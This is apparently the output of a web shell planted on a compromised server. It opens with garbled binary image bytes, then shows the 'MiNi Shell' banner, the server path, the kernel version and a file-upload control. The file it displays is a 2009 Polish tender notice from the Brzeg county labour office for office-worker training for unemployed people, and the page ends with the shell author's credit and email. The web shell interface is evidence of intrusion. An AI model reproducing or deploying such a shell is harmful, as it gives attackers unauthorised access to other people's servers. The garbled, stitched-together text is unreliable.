JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090414/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090414/103742-N-2009.html

<p class="kh_header"><b>Brzeg: Przetarg nieograniczony na organizację i przeprowadzenie szkolenia: Pracownik biurowy dla 15 osób bezrobotnych w zakresie: obsługa komputera, programu kadrowego, księgowego oraz języka obcego</b><br>
<b>Numer ogłoszenia: 103742 - 2009; data zamieszczenia: 14.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Brzegu , ul. Armii Krajowej 32, 49-300 Brzeg, woj. opolskie, tel. 077 4441390 do 2, faks 077 4441390 do 2.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.brzeg.sisco.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na organizację i przeprowadzenie szkolenia: Pracownik biurowy dla 15 osób bezrobotnych w zakresie: obsługa komputera, programu kadrowego, księgowego oraz języka obcego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 Przedmiotem zamówienia jest  przeprowadzenie szkoleń dla 15 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Brzegu w zakresie: Pracownik biurowy                

2 Celem szkolenia jest przygotowanie teoretyczne i praktyczne uczestników szkolenia  do pracy w charakterze pracownika biurowego w zakresie : obsługi komputera, programu kadrowego, księgowego oraz języka obcego
Moduł biurowy - celem jest poznanie podstaw działania biura, wyposażenie i urządzenia techniki biurowej etc.  
Moduł komputerowy - celem jest opanowanie systemu operacyjnego windows, pakietu office tj. Exel, word, power point oraz internetu pod kątem pracy  
Moduł kadrowo -  celem szkolenia jest zapoznanie uczestników z podstawowymi zasadami prawa pracy tj. podstawowe zasady  prawa pracy, nawiązanie stron stosunku pracy, obowiązki pracownika oraz pracodawcy, zasady ustalania wynagrodzenia za pracę itp.
Moduł księgowy - celem jest poznanie ewidencji rachunkowej    
Moduł języka obcego - celem   zwroty z zakresu: słownictwa przydatnego w biurze 
 
3  Szkolenie powinno obejmować następujące bloki:
1. blok  biurowy
2. obsługa komputera 
3. obsługa programu kadrowego
4. obsługa programu księgowego
5. język obcy

4 Miejsce szkolenia: zajęcia teoretyczno - praktyczne powinny odbywać się na terenie Powiatu Brzeskiego. 

5  Przewidywana liczba godzin conajmniej  240  godzin w tym zajęcia praktyczne  200h 
( w tym 90 godzin -język angielski )          
       
Szkolenie winno być realizowane wg planu nauczania obejmującego przeciętnie nie mniej 30 godzin zegarowych w tygodniu. Godzina zegarowa tzn 60 min. 
Zajęcia powinny odbywać się w dni robocze od poniedziałku do piątku w godzinach                      od 8:00 do 15:00. Dzienna  liczba  godzin max.  7 godz.
Okres realizacji szkolenia wyniesie  do 8  tygodni
Termin wykonania zamówienia: po zawarciu umowy:    

6  Uczestnicy szkolenia winni otrzymać zaświadczenia o ukończeniu  zgodnie                                            
z § 6 rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006r w sprawie uzyskania                  i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowej             w formach pozaszkolnych ( Dz. U. Z 2006r. Nr 31, poz. 216 )

7  Wymagania dotyczące kadry :
Zajęcia teoretyczne winny być prowadzone przez osoby z:
a)  wykształceniem wyższym magisterskim z uprawnieniami pedagogicznymi do wykładów przedmiotów zawodowych 

8 Wykonawca winien zapewnić odpowiednie warunki lokalowe. Zajęcia teoretyczne powinny być prowadzone  powinny odbywać w  salach dydaktycznych  wyposażonych               w odpowiednie oprzyrządowanie techniczne w tym aparatura audiowizualna, kserokopiarka , rzutnik pisma, tablica naścienna lub informacyjna , biurka, krzesła.
Wykonawca winien zapewnić odpowiednią ilość sprzętu umożliwiających swobodne uczestnictwo każdego kursanta w zajęciach praktyczno - dydaktycznych.   

9  Wykonawca winien zapewnić: skrypty, materiały dotyczące szkolenia w zakresie: pracownik biurowy, księgowości, prowadzenie kadr, obsługi komputera, język angielski 

10  Każdy z uczestników szkolenia winien prowadzić i wypełniać kartę zajęć praktycznych zgodnie z programem szkolenia, potwierdzoną przez prowadzącego zajęcia .                  

11 Program szkolenia winien obejmować co najmniej następujące zagadnienia:

I Moduł biurowy:
1.	Podstawy działania biura
2.	Wyposażenie i urządzenia techniki biurowej ( kopiarka, faks, skaner, centrala telefoniczna )
3.	Zagadnienia sekretariatu
4.	Organizacja obiegu dokumentów, przyjmowanie korespondencji
5.	Ewidencja, archiwizacja dokumentów
6.	Korespondencja biurowa
7.	Klasyfikacja dokumentów
II Moduł komputerowy :
1. obsługa systemu operacyjnego windows 
2. obsługa  pakietu office tj. exel, word, power point 
3. obsługa internetu 
III Moduł kadrowy :
1. podstawowe pojęcia prawa pracy
2. zasady nawiązanie stosunku pracy 
3. prawa  i obowiązki pracownika oraz pracodawcy  
4. zasady ustalania wynagrodzenia za pracę 
5. obsługa programu kadrowego i płatnika
IV Moduł księgowy :
1.	podstawy rachunkowości
2.	zasady prowadzenia rachunkowości
 3.  wprowadzenie w regulacje prawne
 4.  dokumenty księgowe
 5.  plan kont
 6.  zakładanie i prowadzenie ksiąg rachunkowych
 7.  sporządzenie i opracowywanie dokumentów księgowych  
 8.  ewidencjonowanie zdarzeń gospodarczych na kontach księgowych
 9.  kalkulowanie kosztów i cen
 10.przeprowadzenie inwentaryzacji 
 11. wycena aktywów i pasywów oraz ustalenie wyniku finansowego
 12. sprządzanie i analiza sprawozdań finansowych 
 13. obsługiwanie systemów komputerowych
            
            V  Moduł językowy : język angielski  
moduł powinien zawierać zwroty z zakresu: słownictwa przydatnego w biurze podczas komunikacji ( przedstawienie, rozmowy z klientem, słownictwo biurowe, kadrowo księgowe etc ).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełnią następujące             warunki:
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,  
2.	posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie                     art. 24 ustawy;
5.	posiadają zaświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzonym przez wojewódzki urząd pracy. 


 Ocena spełnienia warunków w postępowaniu o zamówienie publiczne
Z ubiegania się o udzielenie zamówienia publicznego wyklucza się:
1.	wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 ustawy,
2.	wykonawców, którzy wykonywali czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, 
3.	wykonawców, którzy złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania,
4.	wykonawców, którzy nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków,
Zamawiający odrzuca ofertę, która:
a)	  jest niezgodna z ustawą lub jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia,
b)	  jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,
c)	  zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
d)	  została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
e)	zawiera błędy w obliczeniu ceny
f)	 w terminie 3 dni od dnia otrzymania zawiadomienia wykonawca nie zgodził się na poprawienie omyłki rachunkowej w obliczeniu ceny,
f) jest nieważna na podstawie odrębnych przepisów.

Każdy z wykonawców wspólnie ubiegających się o udzielenie przedmiotowego zamówienia powinien spełniać warunki wymienione w pkt. VIII SIWZ. Ocena spełnienia warunków wymaganych od wykonawcy zostanie dokonana wg formuły Spełnia Nie spełnia na podstawie analizy dokumentów lub oświadczeń (zaświadczeń) dołączonych do oferty zgodnie z wymogami zawartymi w pkt. IX SIWZ. W przypadku wykonawców wspólnie ubiegających się o udzielnie przedmiotowego zamówienia dokumenty lub oświadczenia potwierdzające warunki wymienione w pkt. IX każdy z nich składa odrębnie, tak aby jednoznacznie z nich wynikało potwierdzenie spełnienia danego warunku przez każdego z nich odrębnie. Niespełnienie któregokolwiek z warunków spowoduje wykluczenie wykonawcy z postępowania w trybie art. 24 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	 wypełniony formularz oferty (wg załączonego wzoru);
2.	 oświadczenie o spełnianiu warunków wynikających z art. 22 ust. 1 ustawy (wg wzoru określonego w załączniku nr 1 do oferty);
3.	 oświadczenie o niepodleganiu z wykluczenia na podstawie  art. 24 ust. 1 i 2  ustawy z dnia   29 stycznia 2004r  (wg wzoru określonego w załączniku nr 2  do oferty);
4.	 szczegółowy program szkolenia
Program szkolenia winien być zgodny z § 5 rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U. z 2006r. Nr 31, poz. 216). 
Program nauczania każdej formy winien zawierać:
- nazwę formy kształcenia
- czas trwania i sposób jej organizacji
- wymagania wstępne dla uczestników
- cele kształcenia
- plan nauczania określający nazwę zajęć edukacyjnych oraz jej wymiar
- treści kształcenia w zakresie poszczególnych zajęć edukacyjnych
- wykaz literatury oraz niezbędnych środków i zajęć dydaktycznych
- sposób sprawdzania efektów kształcenia
5.	 szczegółową kalkulację kosztów szkolenia 1 osoby (wg wzoru określonego w załączniku         nr   3 do oferty); 
6.	 wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć               w  wykonywaniu zamówienia (wg wzoru określonego w załączniku nr 4 do oferty).
Wymagane jest załączenie aktualnych dokumentów poświadczających posiadanie uprawnień, kwalifikacji w zakresie realizacji przedmiotu zamówienia;
7.	 wykaz niezbędnych do wykonywania zamówienia narzędzi i urządzeń, jakimi dysponuje wykonawca (wg wzoru określonego w załączniku nr 5 do oferty);
8.	 aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed    upływem terminu składania ofert; 
9.	 aktualne zaświadczenie o wpisie do rejestru instytucji szkoleniowych wydane przez        wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej; 
10.	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane załączenie pełnomocnictwa;
11.	 pełnomocnictwo - w przypadku gdy wykonawcę reprezentuje pełnomocnik, posiadające zakres i podpisane przez osoby reprezentujące wykonawcę;


Forma składanych dokumentów
Zgodnie z obowiązującym rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich zamawiający może żądać od  wykonawcy, oraz form, w jakich te dokumenty maja być składane (Dz. U. nr 87 poz. 605), dokumenty należy przedstawić w formie oryginałów albo kserokopii. Dokumenty złożone w formie kserokopii muszą być poświadczone za zgodność z oryginałem przez  osobę uprawnioną do podpisania oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - Warunki lokalowe i sprzęt jakim dysponuje wykonawca - 35</li>
<li>3 - Kwalifikacje kadry dydaktycznej - 15</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://pup.brzeg.sisco.info.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Brzegu, ul. Armii Krajowej 32, 49-300 Brzeg, tel. (077) 444 13 90 do 92 wew. 59, pokój numer 29..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2009 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Brzegu, ul. Armii Krajowej 32, 49-300 Brzeg, pokój 14 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com